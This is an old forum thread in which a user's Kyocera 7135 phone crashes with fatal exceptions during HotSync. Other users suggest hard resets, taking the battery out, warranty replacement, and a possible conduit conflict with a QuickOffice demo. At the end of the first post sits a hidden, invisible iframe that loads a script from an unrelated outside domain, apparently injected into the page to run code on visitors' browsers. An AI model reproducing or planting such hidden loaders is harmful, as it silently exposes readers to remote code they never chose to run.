+ Reply to Thread
    tcv

Now I'm regretting it...

My phone is dead. Dead dead dead.

It fatal excepted during a Hotsync. I hit reset. Now the phone will fatal except before I'm able to even complete the setup.

Hard reset, soft reset, taking out the battery. None of it works.

Just when I thought I had beaten the fatal exceptions I had been getting before.

So, I can't call Kyocera all weekend. My old phone is deactivated. I guess I have to go the mall and get my old phone reactivated.

Not ready for prime-time? I'm beginning to wonder...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You can just call the VZW toll-free number and get your old phone reactivated in minutes.
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

tcv, did you try to do a hard reset? (I take it this is a 7135?)

--terry
    --------------------------------------
    Enjoy the journey, it should be just as much fun as the destination.

tcv
    Yeah, it's a 7135. I did get my old phone activated. At least I have that good news.

I really, really like this phone. This is a real shame.

I'm not really sure what to do now. Should I call Kyocera? Should I call Verizon and try to get a replacement from them?

Assuming you haven't had it for that long, I would call Kyocera to get a replacement under the manufacturer's warranty (which I assume to last for 90 days). If you go through Verizon, you could end up with a refurbished model from some other poor soul whose phone didn't work (or from some other not-so-poor soul whose phone worked fine but didn't take five minutes to figure out how to fix a basic software setting issue). Other people who have needed replacements from Kyocera have gotten them promptly.

Were you installing any particular software when you got the fatal error during hotsync?

Were you running any programs that use conduits (Chapura PocketMirror or Keycontacts, Agendus, etc.)? It could be helpful for others if there was a possible trigger, as a fatal error during hotsync is pretty rare.
    ---------------
    The same thing we do every night, Pinky...

Originally posted by tcv
    Yeah, it's a 7135. I did get my old phone activated. At least I have that good news.

I really, really like this phone. This is a real shame.

I'm not really sure what to do now. Should I call Kyocera? Should I call Verizon and try to get a replacement from them?
    Did you order the 7135 direct from Verizon? If so I would start with them (especially since they have weekend hours). If not then I would be on the phone first thing Monday morning... tech support doesn't start as early as the regular Kyocera CS, but they will at least setup a callback from tech support.

I would try the hard reset again though.
    Please visit my picture site: Robert-O-Rama :)

Originally posted by BrerLapn
    Assuming you haven't had it for that long, I would call Kyocera to get a replacement under the manufacturer's warranty (which I assume to last for 90 days). If you go through Verizon, you could end up with a refurbished model from some other poor soul whose phone didn't work (or from some other not-so-poor soul whose phone worked fine but didn't take five minutes to figure out how to fix a basic software setting issue). Other people who have needed replacements from Kyocera have gotten them promptly.
    Yeah... no matter which way you go you should definitely push hard for a new one! (if it's a problem that can't be fixed with a hard reset)
    Please visit my picture site: Robert-O-Rama :)

I'm in the same boat. mine crashed on sync and a million hard resets later and no go. Called Verizon yesterday. They are shipping another that I should have by Monday with any luck. This is the second time they are replacing the phone. I have had it less than two weeks total . I still think it's the best phone/palm combo. Can't wait to get it back up and running again.
    Linda

17" powerbook OSX

tcv
    I'll post as much information as I can.

Last night, I installed SnapperMail. During the Cleaning up phase of the Hotsync (i.e. at the end), it Fatal Excepted. I noted that I was connected to the 1xRTT network when I did the Hotsync, so I thought that might be related.

I reset, but it came back. No problem.

Today I Hotsynced just to backup my appointment changes. No installs or anything like that. Again, during the Cleaning up phase of the Hotsync, it Fatal Excepted.

I reset and it came back. I happened to do it right at the time I had set SnapperMail to check my mail. I don't know if it was connected to the 1xRTT or not, honestly. So, I made sure I wasn't connected, then HotSynced again, this time to test that theory.

It Fatal Excepted at the same place. This time, however, resetting it brought another Fatal Exception during the setup steps.

I tried a hard reset. The same thing occurred -- fatal exception during the setup steps.

I tried several resets -- hard and soft -- and found that sometimes the LCD never got past "Powering Up". Othertimes it did, but the system would Fatal Except shortly after showing the little animation of the stylus coming out of the phone.

That's where it is now. No type of reset will stop it from fatal excepting.

---

I am using Pocket Mirror. I also have the versions of QuickOffice installed on there. I have the latest PalmReader on it, one book, and two docs. I have Backup on it and have performed a few to my 32MB SD card.

Anything else I should note? This is a USB Hotsync.

Anything else?

Has anybody tested their Beam IR on new Verizon units? My friend's new unit seems to have a dead IR.

I've beamed from my new unit to another 7135 unit and IR syncing also works.
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

tcv: When you installed the SnapperMail stuff, did you also install the QuickOffice Premiere demo? And did you already have the regular QO on there? I found this caused repeated crashes after hotsyncs on mine, until I diabled the QO conduits, uninstalled on both PC and Palm, and reinstalled.

Also, regarding hard resets not helping, I seem to recall someone saying that leaving the battery out for a while, and then plugging the cradle in and turning the phone on while in the cradle helped.... Or something like that-- Not positive of the details, and the message was a while ago and with very few unique keywords , so perhaps someone else has a clearer recall of the exact procedure?

Good luck!

The one time I had the situation where the hard reset did not help, I took the battery out and left it out for about 10 minutes. I then put it back in and did another hard reset and it worked. I think leaving the battery out drains the backup battery and clears the memory.

Has anybody tested their Beam IR on new Verizon units? My friend's new unit seems to have a dead IR.
    One quick and dirty way to test if an IR sending uiti is working is to look at it through a video camera. The viewfinder in the video camera will convert the invisible IR pulses to visible light pulses.

Another Hard Reset Plus I have used (from this forum and confirmed by Kyocera technician) is to remove battery, then press and hold the reset button for 10 seconds or so. I understand this drains a diode that may hold power and protect some memory. It has worked for me once, and not worked once.

tcv
    Originally posted by turboCat
    tcv: When you installed the SnapperMail stuff, did you also install the QuickOffice Premiere demo?
    I don't think so... I'm not really sure.

Where would the Premiere demo have come from? Does SnapperMail include it?

How can I find this out?

m

tcv
    Unless Snappermail put this on, I sincerely don't think I have the QuickOffice Premiere Demo. I don't find any evidence of it, at least none of the backed up software looks like it. There _IS_ the other QuickOffice stuff, but this is the stuff that came with the phone.

m

The SnapperMail demo (the one that I used, anyway ) had the QO Premiere demo in it as well. You would have had to install the qword_premtrial.prc, etc. files as well as the snapper.prc to get it on there. So it would not have done it automatically, but it was in the same zip (and the Snapper instructions suggested trying it).

tcv
    I'll check it out.

Shouldn't this file be in the "backup" folder, though? I don't see it anywhere.

I'll pop the SD card in my Cruzer and see if that PRC is on the backup. I did a backup before everything died.

m

tcv
    The file is definitely not on my SD card. I have to conclude it's not on the Palm. Before I had the bad crash, I did a full BackupBuddyVFS backup to the card.

m